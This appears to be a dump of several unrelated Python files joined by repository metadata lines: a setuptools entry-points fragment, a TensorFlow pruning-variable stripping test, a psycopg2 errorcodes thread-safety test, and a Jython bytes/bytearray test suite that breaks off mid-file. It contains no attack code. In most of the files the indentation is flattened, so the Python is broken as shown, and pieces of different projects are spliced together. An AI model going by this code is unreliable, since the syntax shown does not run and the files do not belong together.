ep = cmd.distribution.entry_points
if isinstance(ep, basestring) or ep is None:
data = ep
    else:
data = []
for section, contents in sorted(ep.items()):
if not isinstance(contents, basestring):
contents = EntryPoint.parse_group(section, contents)
contents = '\n'.join(sorted(map(str, contents.values())))
data.append('[%s]\n%s\n\n' % (section, contents))
data = ''.join(data)
cmd.write_or_delete_file('entry points', filename, data, True)
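# Illustrative: an entry_points dict such as (hypothetical names)
# {'console_scripts': ['tool = pkg.cli:main']} is rendered as:
#   [console_scripts]
#   tool = pkg.cli:main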
def get_pkg_info_revision():
# See if we can get a -r### off of PKG-INFO, in case this is an sdist of
# a subversion revision
#
    if os.path.exists('PKG-INFO'):
        # use a context manager so the file is closed even on early return
        with open('PKG-INFO', 'rU') as f:
            for line in f:
                match = re.match(r"Version:.*-r(\d+)\s*$", line)
                if match:
                    return int(match.group(1))
    return 0
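# e.g. a hypothetical PKG-INFO line "Version: 0.6c11-r88846" yields 88846;
# any version without a trailing -r<digits> suffix yields 0.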
|
jbedorf/tensorflow
|
refs/heads/master
|
tensorflow/contrib/model_pruning/python/strip_pruning_vars_test.py
|
25
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for strip_pruning_vars."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
from tensorflow.contrib.model_pruning.python import pruning
from tensorflow.contrib.model_pruning.python import strip_pruning_vars_lib
from tensorflow.contrib.model_pruning.python.layers import layers
from tensorflow.contrib.model_pruning.python.layers import rnn_cells
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell as tf_rnn_cells
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import training_util
def _get_number_pruning_vars(graph_def):
number_vars = 0
for node in graph_def.node:
if re.match(r"^.*(mask$)|(threshold$)", node.name):
number_vars += 1
return number_vars
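# Note: because re.match anchors at the start of the name, the alternation
# above effectively counts nodes ending in "mask" (e.g. a hypothetical
# "conv1/mask"); a scoped name like "conv1/threshold" only matches when
# the node is literally named "threshold".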
def _get_node_names(tensor_names):
return [
strip_pruning_vars_lib._node_name(tensor_name)
for tensor_name in tensor_names
]
class StripPruningVarsTest(test.TestCase):
def setUp(self):
param_list = [
"pruning_frequency=1", "begin_pruning_step=1", "end_pruning_step=10",
"nbins=2048", "threshold_decay=0.0"
]
self.initial_graph = ops.Graph()
self.initial_graph_def = None
self.final_graph = ops.Graph()
self.final_graph_def = None
self.pruning_spec = ",".join(param_list)
with self.initial_graph.as_default():
self.sparsity = variables.Variable(0.5, name="sparsity")
self.global_step = training_util.get_or_create_global_step()
self.increment_global_step = state_ops.assign_add(self.global_step, 1)
self.mask_update_op = None
def _build_convolutional_model(self, number_of_layers):
# Create a graph with several conv2d layers
kernel_size = 3
base_depth = 4
depth_step = 7
height, width = 7, 9
with variable_scope.variable_scope("conv_model"):
input_tensor = array_ops.ones((8, height, width, base_depth))
top_layer = input_tensor
for ix in range(number_of_layers):
top_layer = layers.masked_conv2d(
top_layer,
base_depth + (ix + 1) * depth_step,
kernel_size,
scope="Conv_" + str(ix))
return top_layer
def _build_fully_connected_model(self, number_of_layers):
base_depth = 4
depth_step = 7
input_tensor = array_ops.ones((8, base_depth))
top_layer = input_tensor
with variable_scope.variable_scope("fc_model"):
for ix in range(number_of_layers):
top_layer = layers.masked_fully_connected(
top_layer, base_depth + (ix + 1) * depth_step)
return top_layer
def _build_lstm_model(self, number_of_layers):
batch_size = 8
dim = 10
inputs = variables.Variable(random_ops.random_normal([batch_size, dim]))
def lstm_cell():
return rnn_cells.MaskedBasicLSTMCell(
dim, forget_bias=0.0, state_is_tuple=True, reuse=False)
cell = tf_rnn_cells.MultiRNNCell(
[lstm_cell() for _ in range(number_of_layers)], state_is_tuple=True)
outputs = rnn.static_rnn(
cell, [inputs],
initial_state=cell.zero_state(batch_size, dtypes.float32))
return outputs
def _prune_model(self, session):
pruning_hparams = pruning.get_pruning_hparams().parse(self.pruning_spec)
p = pruning.Pruning(pruning_hparams, sparsity=self.sparsity)
self.mask_update_op = p.conditional_mask_update_op()
variables.global_variables_initializer().run()
for _ in range(20):
session.run(self.mask_update_op)
session.run(self.increment_global_step)
def _get_outputs(self, session, input_graph, tensors_list, graph_prefix=None):
outputs = []
for output_tensor in tensors_list:
if graph_prefix:
output_tensor = graph_prefix + "/" + output_tensor
outputs.append(
session.run(session.graph.get_tensor_by_name(output_tensor)))
return outputs
def _get_initial_outputs(self, output_tensor_names_list):
with self.session(graph=self.initial_graph) as sess1:
self._prune_model(sess1)
reference_outputs = self._get_outputs(sess1, self.initial_graph,
output_tensor_names_list)
self.initial_graph_def = graph_util.convert_variables_to_constants(
sess1, sess1.graph.as_graph_def(),
_get_node_names(output_tensor_names_list))
return reference_outputs
def _get_final_outputs(self, output_tensor_names_list):
self.final_graph_def = strip_pruning_vars_lib.strip_pruning_vars_fn(
self.initial_graph_def, _get_node_names(output_tensor_names_list))
_ = importer.import_graph_def(self.final_graph_def, name="final")
with self.test_session(self.final_graph) as sess2:
final_outputs = self._get_outputs(
sess2,
self.final_graph,
output_tensor_names_list,
graph_prefix="final")
return final_outputs
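  # Pipeline exercised by the tests below: freeze the pruned graph to
  # constants, strip mask/threshold variables with strip_pruning_vars_fn,
  # re-import the result under the "final" scope, and compare its outputs
  # with those of the original graph.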
def _check_removal_of_pruning_vars(self, number_masked_layers):
self.assertEqual(
_get_number_pruning_vars(self.initial_graph_def), number_masked_layers)
self.assertEqual(_get_number_pruning_vars(self.final_graph_def), 0)
def _check_output_equivalence(self, initial_outputs, final_outputs):
for initial_output, final_output in zip(initial_outputs, final_outputs):
self.assertAllEqual(initial_output, final_output)
def testConvolutionalModel(self):
with self.initial_graph.as_default():
number_masked_conv_layers = 5
top_layer = self._build_convolutional_model(number_masked_conv_layers)
output_tensor_names = [top_layer.name]
initial_outputs = self._get_initial_outputs(output_tensor_names)
# Remove pruning-related nodes.
with self.final_graph.as_default():
final_outputs = self._get_final_outputs(output_tensor_names)
# Check that the final graph has no pruning-related vars
self._check_removal_of_pruning_vars(number_masked_conv_layers)
# Check that outputs remain the same after removal of pruning-related nodes
self._check_output_equivalence(initial_outputs, final_outputs)
def testFullyConnectedModel(self):
with self.initial_graph.as_default():
number_masked_fc_layers = 3
top_layer = self._build_fully_connected_model(number_masked_fc_layers)
output_tensor_names = [top_layer.name]
initial_outputs = self._get_initial_outputs(output_tensor_names)
# Remove pruning-related nodes.
with self.final_graph.as_default():
final_outputs = self._get_final_outputs(output_tensor_names)
# Check that the final graph has no pruning-related vars
self._check_removal_of_pruning_vars(number_masked_fc_layers)
# Check that outputs remain the same after removal of pruning-related nodes
self._check_output_equivalence(initial_outputs, final_outputs)
def testLSTMModel(self):
with self.initial_graph.as_default():
number_masked_lstm_layers = 2
outputs = self._build_lstm_model(number_masked_lstm_layers)
output_tensor_names = [outputs[0][0].name]
initial_outputs = self._get_initial_outputs(output_tensor_names)
# Remove pruning-related nodes.
with self.final_graph.as_default():
final_outputs = self._get_final_outputs(output_tensor_names)
# Check that the final graph has no pruning-related vars
self._check_removal_of_pruning_vars(number_masked_lstm_layers)
# Check that outputs remain the same after removal of pruning-related nodes
self._check_output_equivalence(initial_outputs, final_outputs)
if __name__ == "__main__":
test.main()
|
mcsosa121/cafa
|
refs/heads/master
|
cafaenv/lib/python2.7/site-packages/psycopg2/tests/test_errcodes.py
|
7
|
#!/usr/bin/env python
# test_errcodes.py - unit test for psycopg2.errcodes module
#
# Copyright (C) 2015 Daniele Varrazzo <daniele.varrazzo@gmail.com>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
from testutils import unittest, ConnectingTestCase
try:
reload
except NameError:
from imp import reload
from threading import Thread
from psycopg2 import errorcodes
class ErrorcodeTests(ConnectingTestCase):
def test_lookup_threadsafe(self):
        # Increase MAX_CYCLES if the race does not reproduce as a KeyError
MAX_CYCLES = 2000
errs = []
def f(pg_code='40001'):
try:
errorcodes.lookup(pg_code)
except Exception, e:
errs.append(e)
for __ in xrange(MAX_CYCLES):
reload(errorcodes)
(t1, t2) = (Thread(target=f), Thread(target=f))
(t1.start(), t2.start())
(t1.join(), t2.join())
if errs:
self.fail(
"raised %s errors in %s cycles (first is %s %s)" % (
len(errs), MAX_CYCLES,
errs[0].__class__.__name__, errs[0]))
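    # For reference: errorcodes.lookup('40001') returns
    # 'SERIALIZATION_FAILURE'; reload() rebuilds the module's lookup map,
    # which is what used to race against concurrent lookup() calls.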
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
|
tunneln/CarnotKE
|
refs/heads/master
|
jyhton/Lib/test/test_bytes.py
|
9
|
"""Unit tests for the bytes and bytearray types.
XXX This is a mess. Common tests should be moved to buffer_tests.py,
which itself ought to be unified with string_tests.py (and the latter
should be modernized).
"""
import os
import re
import sys
import copy
import functools
import pickle
import tempfile
import unittest
import test.test_support
import test.string_tests
import test.buffer_tests
if sys.flags.bytes_warning:
def check_bytes_warnings(func):
@functools.wraps(func)
def wrapper(*args, **kw):
with test.test_support.check_warnings(('', BytesWarning)):
return func(*args, **kw)
return wrapper
else:
# no-op
def check_bytes_warnings(func):
return func
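# Illustrative: when run with python -b (sys.flags.bytes_warning),
# comparing bytes with unicode emits a BytesWarning; the decorator wraps
# the test so that warning is captured and checked instead of escaping.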
class Indexable:
def __init__(self, value=0):
self.value = value
def __index__(self):
return self.value
class BaseBytesTest(unittest.TestCase):
def test_basics(self):
b = self.type2test()
self.assertEqual(type(b), self.type2test)
self.assertEqual(b.__class__, self.type2test)
def test_empty_sequence(self):
b = self.type2test()
self.assertEqual(len(b), 0)
self.assertRaises(IndexError, lambda: b[0])
self.assertRaises(IndexError, lambda: b[1])
self.assertRaises(IndexError, lambda: b[sys.maxint])
self.assertRaises(IndexError, lambda: b[sys.maxint+1])
self.assertRaises(IndexError, lambda: b[10**100])
self.assertRaises(IndexError, lambda: b[-1])
self.assertRaises(IndexError, lambda: b[-2])
self.assertRaises(IndexError, lambda: b[-sys.maxint])
self.assertRaises(IndexError, lambda: b[-sys.maxint-1])
self.assertRaises(IndexError, lambda: b[-sys.maxint-2])
self.assertRaises(IndexError, lambda: b[-10**100])
def test_from_list(self):
ints = list(range(256))
b = self.type2test(i for i in ints)
self.assertEqual(len(b), 256)
self.assertEqual(list(b), ints)
def test_from_index(self):
b = self.type2test([Indexable(), Indexable(1), Indexable(254),
Indexable(255)])
self.assertEqual(list(b), [0, 1, 254, 255])
self.assertRaises(ValueError, self.type2test, [Indexable(-1)])
self.assertRaises(ValueError, self.type2test, [Indexable(256)])
def test_from_ssize(self):
self.assertEqual(self.type2test(0), b'')
self.assertEqual(self.type2test(1), b'\x00')
self.assertEqual(self.type2test(5), b'\x00\x00\x00\x00\x00')
self.assertRaises(ValueError, self.type2test, -1)
self.assertEqual(self.type2test('0', 'ascii'), b'0')
self.assertEqual(self.type2test(b'0'), b'0')
self.assertRaises(OverflowError, self.type2test, sys.maxsize + 1)
def test_constructor_type_errors(self):
self.assertRaises(TypeError, self.type2test, 0.0)
class C:
pass
# allowed in 2.x
#self.assertRaises(TypeError, self.type2test, ["0"])
self.assertRaises(TypeError, self.type2test, [0.0])
self.assertRaises(TypeError, self.type2test, [None])
self.assertRaises(TypeError, self.type2test, [C()])
def test_constructor_value_errors(self):
self.assertRaises(ValueError, self.type2test, [-1])
self.assertRaises(ValueError, self.type2test, [-sys.maxint])
self.assertRaises(ValueError, self.type2test, [-sys.maxint-1])
self.assertRaises(ValueError, self.type2test, [-sys.maxint-2])
self.assertRaises(ValueError, self.type2test, [-10**100])
self.assertRaises(ValueError, self.type2test, [256])
self.assertRaises(ValueError, self.type2test, [257])
self.assertRaises(ValueError, self.type2test, [sys.maxint])
self.assertRaises(ValueError, self.type2test, [sys.maxint+1])
self.assertRaises(ValueError, self.type2test, [10**100])
def test_compare(self):
b1 = self.type2test([1, 2, 3])
b2 = self.type2test([1, 2, 3])
b3 = self.type2test([1, 3])
self.assertEqual(b1, b2)
self.assertTrue(b2 != b3)
self.assertTrue(b1 <= b2)
self.assertTrue(b1 <= b3)
self.assertTrue(b1 < b3)
self.assertTrue(b1 >= b2)
self.assertTrue(b3 >= b2)
self.assertTrue(b3 > b2)
self.assertFalse(b1 != b2)
self.assertFalse(b2 == b3)
self.assertFalse(b1 > b2)
self.assertFalse(b1 > b3)
self.assertFalse(b1 >= b3)
self.assertFalse(b1 < b2)
self.assertFalse(b3 < b2)
self.assertFalse(b3 <= b2)
@check_bytes_warnings
def test_compare_to_str(self):
# Byte comparisons with unicode should always fail!
# Test this for all expected byte orders and Unicode character sizes
self.assertEqual(self.type2test(b"\0a\0b\0c") == u"abc", False)
self.assertEqual(self.type2test(b"\0\0\0a\0\0\0b\0\0\0c") == u"abc", False)
self.assertEqual(self.type2test(b"a\0b\0c\0") == u"abc", False)
self.assertEqual(self.type2test(b"a\0\0\0b\0\0\0c\0\0\0") == u"abc", False)
self.assertEqual(self.type2test() == unicode(), False)
self.assertEqual(self.type2test() != unicode(), True)
def test_reversed(self):
input = list(map(ord, "Hello"))
b = self.type2test(input)
output = list(reversed(b))
input.reverse()
self.assertEqual(output, input)
def test_getslice(self):
def by(s):
return self.type2test(map(ord, s))
b = by("Hello, world")
self.assertEqual(b[:5], by("Hello"))
self.assertEqual(b[1:5], by("ello"))
self.assertEqual(b[5:7], by(", "))
self.assertEqual(b[7:], by("world"))
self.assertEqual(b[7:12], by("world"))
self.assertEqual(b[7:100], by("world"))
self.assertEqual(b[:-7], by("Hello"))
self.assertEqual(b[-11:-7], by("ello"))
self.assertEqual(b[-7:-5], by(", "))
self.assertEqual(b[-5:], by("world"))
self.assertEqual(b[-5:12], by("world"))
self.assertEqual(b[-5:100], by("world"))
self.assertEqual(b[-100:5], by("Hello"))
def test_extended_getslice(self):
# Test extended slicing by comparing with list slicing.
L = list(range(255))
b = self.type2test(L)
indices = (0, None, 1, 3, 19, 100, -1, -2, -31, -100)
for start in indices:
for stop in indices:
# Skip step 0 (invalid)
for step in indices[1:]:
self.assertEqual(b[start:stop:step], self.type2test(L[start:stop:step]))
#XXX: Jython doesn't support codepoints outside of the UTF-16 range even at
# parse time. Maybe someday we might push the error off to later, but for
# now I'm just commenting this whole test out.
# See http://bugs.jython.org/issue1836 for more.
# def test_encoding(self):
# sample = u"Hello world\n\u1234\u5678\u9abc\udef0"
# for enc in ("utf8", "utf16"):
# b = self.type2test(sample, enc)
# self.assertEqual(b, self.type2test(sample.encode(enc)))
# self.assertRaises(UnicodeEncodeError, self.type2test, sample, "latin1")
# b = self.type2test(sample, "latin1", "ignore")
# self.assertEqual(b, self.type2test(sample[:-4], "utf-8"))
def test_decode(self):
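        # NB: "\def0" below is not a valid escape sequence, so it
        # contributes the literal characters backslash-d-e-f-0 (most
        # likely a historical typo for \udef0); the encode/decode
        # round-trip holds either way.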
sample = u"Hello world\n\u1234\u5678\u9abc\def0\def0"
for enc in ("utf8", "utf16"):
b = self.type2test(sample, enc)
self.assertEqual(b.decode(enc), sample)
sample = u"Hello world\n\x80\x81\xfe\xff"
b = self.type2test(sample, "latin1")
self.assertRaises(UnicodeDecodeError, b.decode, "utf8")
self.assertEqual(b.decode("utf8", "ignore"), "Hello world\n")
self.assertEqual(b.decode(errors="ignore", encoding="utf8"),
"Hello world\n")
def test_from_int(self):
b = self.type2test(0)
self.assertEqual(b, self.type2test())
b = self.type2test(10)
self.assertEqual(b, self.type2test([0]*10))
b = self.type2test(10000)
self.assertEqual(b, self.type2test([0]*10000))
def test_concat(self):
b1 = self.type2test(b"abc")
b2 = self.type2test(b"def")
self.assertEqual(b1 + b2, b"abcdef")
self.assertEqual(b1 + bytes(b"def"), b"abcdef")
self.assertEqual(bytes(b"def") + b1, b"defabc")
self.assertRaises(TypeError, lambda: b1 + u"def")
self.assertRaises(TypeError, lambda: u"abc" + b2)
def test_repeat(self):
for b in b"abc", self.type2test(b"abc"):
self.assertEqual(b * 3, b"abcabcabc")
self.assertEqual(b * 0, b"")
self.assertEqual(b * -1, b"")
self.assertRaises(TypeError, lambda: b * 3.14)
self.assertRaises(TypeError, lambda: 3.14 * b)
# XXX Shouldn't bytes and bytearray agree on what to raise?
self.assertRaises((OverflowError, MemoryError),
lambda: b * sys.maxsize)
def test_repeat_1char(self):
self.assertEqual(self.type2test(b'x')*100, self.type2test([ord('x')]*100))
def test_contains(self):
b = self.type2test(b"abc")
self.assertIn(ord('a'), b)
self.assertIn(int(ord('a')), b)
self.assertNotIn(200, b)
self.assertRaises(ValueError, lambda: 300 in b)
self.assertRaises(ValueError, lambda: -1 in b)
self.assertRaises(TypeError, lambda: None in b)
self.assertRaises(TypeError, lambda: float(ord('a')) in b)
self.assertRaises(TypeError, lambda: u"a" in b)
for f in bytes, bytearray:
self.assertIn(f(b""), b)
self.assertIn(f(b"a"), b)
self.assertIn(f(b"b"), b)
self.assertIn(f(b"c"), b)
self.assertIn(f(b"ab"), b)
self.assertIn(f(b"bc"), b)
self.assertIn(f(b"abc"), b)
self.assertNotIn(f(b"ac"), b)
self.assertNotIn(f(b"d"), b)
self.assertNotIn(f(b"dab"), b)
self.assertNotIn(f(b"abd"), b)
def test_fromhex(self):
self.assertRaises(TypeError, self.type2test.fromhex)
self.assertRaises(TypeError, self.type2test.fromhex, 1)
self.assertEqual(self.type2test.fromhex(u''), self.type2test())
b = bytearray([0x1a, 0x2b, 0x30, 0xca, 0xfe, 0xba, 0xbe]) # challenging signs
self.assertEqual(self.type2test.fromhex(u'1a2B30CafEBabe'), b)
self.assertEqual(self.type2test.fromhex(u' 1A 2B 30 CafeBabe '), b)
self.assertEqual(self.type2test.fromhex(u'0000'), b'\0\0')
self.assertRaises(ValueError, self.type2test.fromhex, u'a')
self.assertRaises(ValueError, self.type2test.fromhex, u'rt')
self.assertRaises(ValueError, self.type2test.fromhex, u'1a b cd')
self.assertRaises(ValueError, self.type2test.fromhex, u'\x00')
self.assertRaises(ValueError, self.type2test.fromhex, u'12 \x00 34')
def test_join(self):
self.assertEqual(self.type2test(b"").join([]), b"")
self.assertEqual(self.type2test(b"").join([b""]), b"")
for lst in [[b"abc"], [b"a", b"bc"], [b"ab", b"c"], [b"a", b"b", b"c"]]:
lst = list(map(self.type2test, lst))
self.assertEqual(self.type2test(b"").join(lst), b"abc")
self.assertEqual(self.type2test(b"").join(tuple(lst)), b"abc")
self.assertEqual(self.type2test(b"").join(iter(lst)), b"abc")
self.assertEqual(self.type2test(b".").join([b"ab", b"cd"]), b"ab.cd")
# XXX more...
def test_count(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.count(b'i'), 4)
self.assertEqual(b.count(b'ss'), 2)
self.assertEqual(b.count(b'w'), 0)
def test_startswith(self):
b = self.type2test(b'hello')
self.assertFalse(self.type2test().startswith(b"anything"))
self.assertTrue(b.startswith(b"hello"))
self.assertTrue(b.startswith(b"hel"))
self.assertTrue(b.startswith(b"h"))
self.assertFalse(b.startswith(b"hellow"))
self.assertFalse(b.startswith(b"ha"))
def test_endswith(self):
b = self.type2test(b'hello')
self.assertFalse(bytearray().endswith(b"anything"))
self.assertTrue(b.endswith(b"hello"))
self.assertTrue(b.endswith(b"llo"))
self.assertTrue(b.endswith(b"o"))
self.assertFalse(b.endswith(b"whello"))
self.assertFalse(b.endswith(b"no"))
def test_find(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.find(b'ss'), 2)
self.assertEqual(b.find(b'ss', 3), 5)
self.assertEqual(b.find(b'ss', 1, 7), 2)
self.assertEqual(b.find(b'ss', 1, 3), -1)
self.assertEqual(b.find(b'w'), -1)
self.assertEqual(b.find(b'mississippian'), -1)
def test_rfind(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.rfind(b'ss'), 5)
self.assertEqual(b.rfind(b'ss', 3), 5)
self.assertEqual(b.rfind(b'ss', 0, 6), 2)
self.assertEqual(b.rfind(b'w'), -1)
self.assertEqual(b.rfind(b'mississippian'), -1)
def test_index(self):
b = self.type2test(b'world')
self.assertEqual(b.index(b'w'), 0)
self.assertEqual(b.index(b'orl'), 1)
self.assertRaises(ValueError, b.index, b'worm')
self.assertRaises(ValueError, b.index, b'ldo')
def test_rindex(self):
# XXX could be more rigorous
b = self.type2test(b'world')
self.assertEqual(b.rindex(b'w'), 0)
self.assertEqual(b.rindex(b'orl'), 1)
self.assertRaises(ValueError, b.rindex, b'worm')
self.assertRaises(ValueError, b.rindex, b'ldo')
def test_replace(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.replace(b'i', b'a'), b'massassappa')
self.assertEqual(b.replace(b'ss', b'x'), b'mixixippi')
def test_split(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.split(b'i'), [b'm', b'ss', b'ss', b'pp', b''])
self.assertEqual(b.split(b'ss'), [b'mi', b'i', b'ippi'])
self.assertEqual(b.split(b'w'), [b])
def test_split_whitespace(self):
for b in (b' arf barf ', b'arf\tbarf', b'arf\nbarf', b'arf\rbarf',
b'arf\fbarf', b'arf\vbarf'):
b = self.type2test(b)
self.assertEqual(b.split(), [b'arf', b'barf'])
self.assertEqual(b.split(None), [b'arf', b'barf'])
self.assertEqual(b.split(None, 2), [b'arf', b'barf'])
for b in (b'a\x1Cb', b'a\x1Db', b'a\x1Eb', b'a\x1Fb'):
b = self.type2test(b)
self.assertEqual(b.split(), [b])
self.assertEqual(self.type2test(b' a bb c ').split(None, 0), [b'a bb c '])
self.assertEqual(self.type2test(b' a bb c ').split(None, 1), [b'a', b'bb c '])
self.assertEqual(self.type2test(b' a bb c ').split(None, 2), [b'a', b'bb', b'c '])
self.assertEqual(self.type2test(b' a bb c ').split(None, 3), [b'a', b'bb', b'c'])
def test_split_string_error(self):
self.assertRaises(TypeError, self.type2test(b'a b').split, u' ')
def test_split_unicodewhitespace(self):
b = self.type2test(b"\x09\x0A\x0B\x0C\x0D\x1C\x1D\x1E\x1F")
self.assertEqual(b.split(), [b'\x1c\x1d\x1e\x1f'])
def test_rsplit(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.rsplit(b'i'), [b'm', b'ss', b'ss', b'pp', b''])
self.assertEqual(b.rsplit(b'ss'), [b'mi', b'i', b'ippi'])
self.assertEqual(b.rsplit(b'w'), [b])
def test_rsplit_whitespace(self):
for b in (b' arf barf ', b'arf\tbarf', b'arf\nbarf', b'arf\rbarf',
b'arf\fbarf', b'arf\vbarf'):
b = self.type2test(b)
self.assertEqual(b.rsplit(), [b'arf', b'barf'])
self.assertEqual(b.rsplit(None), [b'arf', b'barf'])
self.assertEqual(b.rsplit(None, 2), [b'arf', b'barf'])
self.assertEqual(self.type2test(b' a bb c ').rsplit(None, 0), [b' a bb c'])
self.assertEqual(self.type2test(b' a bb c ').rsplit(None, 1), [b' a bb', b'c'])
self.assertEqual(self.type2test(b' a bb c ').rsplit(None, 2), [b' a', b'bb', b'c'])
self.assertEqual(self.type2test(b' a bb c ').rsplit(None, 3), [b'a', b'bb', b'c'])
def test_rsplit_string_error(self):
self.assertRaises(TypeError, self.type2test(b'a b').rsplit, u' ')
def test_rsplit_unicodewhitespace(self):
b = self.type2test(b"\x09\x0A\x0B\x0C\x0D\x1C\x1D\x1E\x1F")
self.assertEqual(b.rsplit(), [b'\x1c\x1d\x1e\x1f'])
def test_partition(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.partition(b'ss'), (b'mi', b'ss', b'issippi'))
self.assertEqual(b.partition(b'w'), (b'mississippi', b'', b''))
def test_rpartition(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.rpartition(b'ss'), (b'missi', b'ss', b'ippi'))
self.assertEqual(b.rpartition(b'i'), (b'mississipp', b'i', b''))
self.assertEqual(b.rpartition(b'w'), (b'', b'', b'mississippi'))
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for b in b"", b"a", b"abc", b"\xffab\x80", b"\0\0\377\0\0":
b = self.type2test(b)
ps = pickle.dumps(b, proto)
q = pickle.loads(ps)
self.assertEqual(b, q)
def test_strip(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.strip(b'i'), b'mississipp')
self.assertEqual(b.strip(b'm'), b'ississippi')
self.assertEqual(b.strip(b'pi'), b'mississ')
self.assertEqual(b.strip(b'im'), b'ssissipp')
self.assertEqual(b.strip(b'pim'), b'ssiss')
self.assertEqual(b.strip(b), b'')
def test_lstrip(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.lstrip(b'i'), b'mississippi')
self.assertEqual(b.lstrip(b'm'), b'ississippi')
self.assertEqual(b.lstrip(b'pi'), b'mississippi')
self.assertEqual(b.lstrip(b'im'), b'ssissippi')
self.assertEqual(b.lstrip(b'pim'), b'ssissippi')
def test_rstrip(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.rstrip(b'i'), b'mississipp')
self.assertEqual(b.rstrip(b'm'), b'mississippi')
self.assertEqual(b.rstrip(b'pi'), b'mississ')
self.assertEqual(b.rstrip(b'im'), b'mississipp')
self.assertEqual(b.rstrip(b'pim'), b'mississ')
def test_strip_whitespace(self):
b = self.type2test(b' \t\n\r\f\vabc \t\n\r\f\v')
self.assertEqual(b.strip(), b'abc')
self.assertEqual(b.lstrip(), b'abc \t\n\r\f\v')
self.assertEqual(b.rstrip(), b' \t\n\r\f\vabc')
def test_strip_bytearray(self):
self.assertEqual(self.type2test(b'abc').strip(memoryview(b'ac')), b'b')
self.assertEqual(self.type2test(b'abc').lstrip(memoryview(b'ac')), b'bc')
self.assertEqual(self.type2test(b'abc').rstrip(memoryview(b'ac')), b'ab')
def test_strip_string_error(self):
self.assertRaises(TypeError, self.type2test(b'abc').strip, u'b')
self.assertRaises(TypeError, self.type2test(b'abc').lstrip, u'b')
self.assertRaises(TypeError, self.type2test(b'abc').rstrip, u'b')
def test_ord(self):
b = self.type2test(b'\0A\x7f\x80\xff')
self.assertEqual([ord(b[i:i+1]) for i in range(len(b))],
[0, 65, 127, 128, 255])
def test_none_arguments(self):
# issue 11828
b = self.type2test(b'hello')
l = self.type2test(b'l')
h = self.type2test(b'h')
x = self.type2test(b'x')
o = self.type2test(b'o')
self.assertEqual(2, b.find(l, None))
self.assertEqual(3, b.find(l, -2, None))
self.assertEqual(2, b.find(l, None, -2))
self.assertEqual(0, b.find(h, None, None))
self.assertEqual(3, b.rfind(l, None))
self.assertEqual(3, b.rfind(l, -2, None))
self.assertEqual(2, b.rfind(l, None, -2))
self.assertEqual(0, b.rfind(h, None, None))
self.assertEqual(2, b.index(l, None))
self.assertEqual(3, b.index(l, -2, None))
self.assertEqual(2, b.index(l, None, -2))
self.assertEqual(0, b.index(h, None, None))
self.assertEqual(3, b.rindex(l, None))
self.assertEqual(3, b.rindex(l, -2, None))
self.assertEqual(2, b.rindex(l, None, -2))
self.assertEqual(0, b.rindex(h, None, None))
self.assertEqual(2, b.count(l, None))
self.assertEqual(1, b.count(l, -2, None))
self.assertEqual(1, b.count(l, None, -2))
self.assertEqual(0, b.count(x, None, None))
self.assertEqual(True, b.endswith(o, None))
self.assertEqual(True, b.endswith(o, -2, None))
self.assertEqual(True, b.endswith(l, None, -2))
self.assertEqual(False, b.endswith(x, None, None))
self.assertEqual(True, b.startswith(h, None))
self.assertEqual(True, b.startswith(l, -2, None))
self.assertEqual(True, b.startswith(h, None, -2))
self.assertEqual(False, b.startswith(x, None, None))
def test_find_etc_raise_correct_error_messages(self):
# issue 11828
b = self.type2test(b'hello')
x = self.type2test(b'x')
self.assertRaisesRegexp(TypeError, r'\bfind\b', b.find,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\brfind\b', b.rfind,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\bindex\b', b.index,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\brindex\b', b.rindex,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\bcount\b', b.count,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\bstartswith\b', b.startswith,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\bendswith\b', b.endswith,
x, None, None, None)
def test_translate(self):
# adapted from AssortedBytesTest.test_translate
b = self.type2test(b'hello')
rosetta = self.type2test().join(map(chr,range(256)))
rosetta[ord('o')] = ord('e')
c = b.translate(rosetta, b'l')
self.assertEqual(b, b'hello')
self.assertEqual(c, b'hee')
c = b.translate(None, b'e')
self.assertEqual(c, b'hllo')
c = b.translate(None, b'the larch')
self.assertEqual(c, b'o')
stone = self.type2test(''.join(map(chr,range(1,256))))
self.assertRaises(ValueError, b.translate, stone, b'short')
